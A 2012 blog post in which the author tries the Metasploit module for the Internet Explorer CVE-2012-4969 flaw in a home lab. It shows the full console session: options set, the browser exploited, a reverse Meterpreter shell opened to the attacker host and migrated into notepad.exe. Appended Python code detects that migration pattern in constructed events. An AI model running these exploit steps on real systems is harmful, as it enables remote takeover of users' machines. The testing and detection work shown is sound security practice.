Thursday, September 20, 2012

CVE-2012-4969 0-day exploit for IE 7, 8 & 9 on Windows XP, Vista, and 7

The IE vulnerability reported on September 18
http://isc.sans.edu/diary/IE+Zero+Day+is+For+Real+/14107
http://jvn.jp/cert/JVNVU480095/index.html

A fix is scheduled to be released on September 21
http://www.ipa.go.jp/security/ciadr/vul/20120920-windows.html

It has also been made available as a Metasploit module, so I tried it out

https://community.rapid7.com/community/metasploit/blog/2012/09/17/lets-start-the-week-with-a-new-internet-explorer-0-day-in-metasploit

http://www.metasploit.com/modules/exploit/windows/browser/ie_execcommand_uaf

Below are the verification results on XP + IE8

msf >
msf > use exploit/windows/browser/ie_execcommand_uaf
msf  exploit(ie_execcommand_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ie_execcommand_uaf) > show options

Module options (exploit/windows/browser/ie_execcommand_uaf):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(ie_execcommand_uaf) > srvhost 192.168.1.84
[-] Unknown command: srvhost.
msf  exploit(ie_execcommand_uaf) > set srvhost 192.168.1.84
srvhost => 192.168.1.84
msf  exploit(ie_execcommand_uaf) > set lhost 192.168.1.84
lhost => 192.168.1.84
msf  exploit(ie_execcommand_uaf) > set srvport 80
srvport => 80
msf  exploit(ie_execcommand_uaf) > set lport 8080
lport => 8080
msf  exploit(ie_execcommand_uaf) > set uripath test
uripath => test
msf  exploit(ie_execcommand_uaf) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.84:8080
[*] Using URL: http://192.168.1.84:80/test
[*] Server started.
msf  exploit(ie_execcommand_uaf) > [*] 192.168.1.51    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
[*] 192.168.1.51    ie_execcommand_uaf - Redirecting to Pjeam.html
[*] 192.168.1.51    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
[*] 192.168.1.51    ie_execcommand_uaf - Loading Pjeam.html
[*] 192.168.1.51    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
[*] 192.168.1.51    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
[*] 192.168.1.51    ie_execcommand_uaf - Loading VKxmjc.html
[*] 192.168.1.51    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
[*] Sending stage (752128 bytes) to 192.168.1.51
[*] Meterpreter session 1 opened (192.168.1.84:8080 -> 192.168.1.51:2725) at 2012-09-20 22:30:40 +0900
[*] Session ID 1 (192.168.1.84:8080 -> 192.168.1.51:2725) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (11744)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 11780
[+] Successfully migrated to process
msf  exploit(ie_execcommand_uaf) >
msf  exploit(ie_execcommand_uaf) >
It worked, at least for now.
I tried a few other combinations as well, but there were cases where it did not work.
My impression is that the success rate is better with Java.
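From the defender's side, the most visible part of the session above is the end of it: the payload migrates out of iexplore.exe into a freshly spawned notepad.exe, and that notepad.exe is then the process holding the reverse connection to port 8080. The following added example (my own code, not part of the post or of Metasploit) runs two simple host-side rules over constructed Sysmon-style process and network events: a browser spawning a process that never needs the network, and such a process opening an outbound connection. The event shape, the PIDs and the process lists are assumptions for illustration.

```python
"""Host-side detection for the migration step: browser -> notepad.exe -> network.
Events are constructed samples in a Sysmon-like shape, not real logs."""

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe"}
# Processes that have no business opening sockets; popular migration targets
# precisely because they are quiet and rarely inspected.
NO_NETWORK_EXPECTED = {"notepad.exe", "calc.exe", "mspaint.exe"}

# Constructed sample events. PIDs mirror the session log above; everything else is invented.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 3104, "ppid": 1000, "image": "C:\\Windows\\explorer.exe"},
    {"type": "process_create", "pid": 11744, "ppid": 3104,
     "image": "C:\\Program Files\\Internet Explorer\\iexplore.exe"},
    {"type": "network_connect", "pid": 11744, "dst": "192.168.1.84", "dport": 80},    # page load
    {"type": "network_connect", "pid": 11744, "dst": "192.168.1.84", "dport": 8080},  # stage fetch
    {"type": "process_create", "pid": 11780, "ppid": 11744,
     "image": "C:\\Windows\\System32\\notepad.exe"},                                  # migrate -f
    {"type": "network_connect", "pid": 11780, "dst": "192.168.1.84", "dport": 8080},  # session moves
    # Benign: the user opens Notepad from Explorer and it never touches the network.
    {"type": "process_create", "pid": 11790, "ppid": 3104,
     "image": "C:\\Windows\\System32\\notepad.exe"},
]


def image_name(path):
    """Strip the directory and normalise case so rules compare bare executable names."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return findings as (rule, pid, detail) tuples, in event order."""
    images = {}      # pid -> executable name, built from process_create events
    findings = []
    for ev in events:
        if ev["type"] == "process_create":
            img = image_name(ev["image"])
            images[ev["pid"]] = img
            parent = images.get(ev["ppid"])
            if parent in BROWSERS and img in NO_NETWORK_EXPECTED:
                findings.append(("browser_spawned_quiet_process", ev["pid"], f"{parent} -> {img}"))
        elif ev["type"] == "network_connect":
            img = images.get(ev["pid"], "unknown")
            if img in NO_NETWORK_EXPECTED:
                findings.append(("quiet_process_network", ev["pid"],
                                 f"{img} -> {ev['dst']}:{ev['dport']}"))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] pid={pid} {detail}")
```

Either rule alone is noisy in some environments; the two together, on the same PID within a short window, are a much stronger signal than watching for the exploit page itself, whose file names are randomised per run.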